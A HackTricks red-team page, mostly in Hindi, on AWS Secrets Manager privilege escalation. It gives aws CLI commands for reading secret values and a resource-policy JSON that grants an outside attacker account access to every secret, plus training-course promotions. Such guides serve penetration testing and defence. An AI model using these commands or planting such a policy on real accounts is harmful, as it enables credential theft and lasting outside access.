AWS - Secrets Manager Privesc

Reading time: 3 minutes

tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें

Secrets Manager

secrets manager के बारे में अधिक जानकारी के लिए देखें:

AWS - Secrets Manager Enum

secretsmanager:GetSecretValue

इस permission वाले attacker AWS Secretsmanager में किसी secret के अंदर सहेजा गया मान प्राप्त कर सकते हैं।

bash
aws secretsmanager get-secret-value --secret-id <secret_name> # Get value

Potential Impact: AWS secrets manager service के अंदर उच्च संवेदनशील डेटा तक पहुँच।

warning

ध्यान दें कि भले ही किसी के पास secretsmanager:BatchGetSecretValue permission हो, एक attacker को संवेदनशील secrets प्राप्त करने के लिए secretsmanager:GetSecretValue की भी आवश्यकता होगी।

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

पिछली permissions के साथ यह संभव है कि अन्य principals/accounts (even external) को secret तक पहुँच प्रदान की जा सके। ध्यान रहें कि KMS key से एन्क्रिप्ट की गई secrets को पढ़ने के लिए user के पास KMS key का भी access होना आवश्यक है (अधिक जानकारी के लिए KMS Enum page).

bash
aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json

policy.json:

json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<attackers_account>:root"
},
"Action": "secretsmanager:GetSecretValue",
"Resource": "*"
}
]
}

tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें